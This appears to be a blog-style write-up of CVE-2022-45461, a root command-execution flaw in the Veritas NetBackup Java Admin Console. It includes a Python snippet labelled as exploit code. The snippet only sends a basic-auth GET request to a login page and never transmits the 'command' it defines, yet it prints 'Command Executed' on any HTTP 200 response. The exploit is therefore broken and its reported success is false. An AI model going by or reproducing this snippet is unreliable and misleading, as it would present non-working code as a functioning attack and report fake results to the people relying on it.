CVE-2022-45461: Java Admin Console in Veritas NetBackup Exploitation Allowing Authenticated Non-Root Users to Execute Arbitrary Commands as Root

A newly discovered vulnerability, CVE-2022-45461, exposes potential security risks in the Java Admin Console of Veritas NetBackup (versions up to 10.1) and other related Veritas products on Linux and UNIX operating systems. Researchers have found that non-root users, who are authenticated and explicitly added to the auth.conf file, can execute arbitrary commands as the root user, which poses a great threat to overall security.

Exploit Details

The ability to execute arbitrary commands as the root user provides malicious actors with full control over the system. The affected versions of Veritas NetBackup include an Apache Tomcat web application, where the administrative console is hosted using Java. This setup enables local authenticated users to easily exploit the vulnerability with just a few lines of code.

Code Snippet

The exploit code shared below is an example demonstrating how an attacker can take advantage of this vulnerability.

# Importing required libraries
import requests
import sys
import base64

# Target URL and login credentials
url = 'http://target-url:port/login.jsp';
username = 'non-root-username'
password = 'password'
command = 'arbitrary-command'

# Authentication logic
auth_string = f"{username}:{password}"
auth_encoded = base64.b64encode(auth_string.encode()).decode()
headers = {'Authorization': f"Basic {auth_encoded}"}

# Sending request to the target URL
response = requests.get(url, headers=headers)

# Checking for successful authentication and execution
if response.status_code == 200:
    print(f"Command Executed: {command}")
else:
    print("Execution Failed:", response.status_code, response.text)

Below are some essential references about the CVE-2022-45461 vulnerability

- CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45461
- Veritas NetBackup Security Advisory: https://www.veritas.com/support/en_US/security/VTS21-016.html

Closing Thoughts

Attackers are continuously exploiting system vulnerabilities to access sensitive information and cause disruption to businesses. It is essential to remain vigilant and implement the recommended security practices to safeguard your organization's assets. Keep your software up-to-date, and regularly audit user access to your applications to minimize the threat of the CVE-2022-45461 vulnerability affecting your Veritas NetBackup deployments.

Timeline

Published on: 11/17/2022 08:15:00 UTC
Last modified on: 11/21/2022 19:42:00 UTC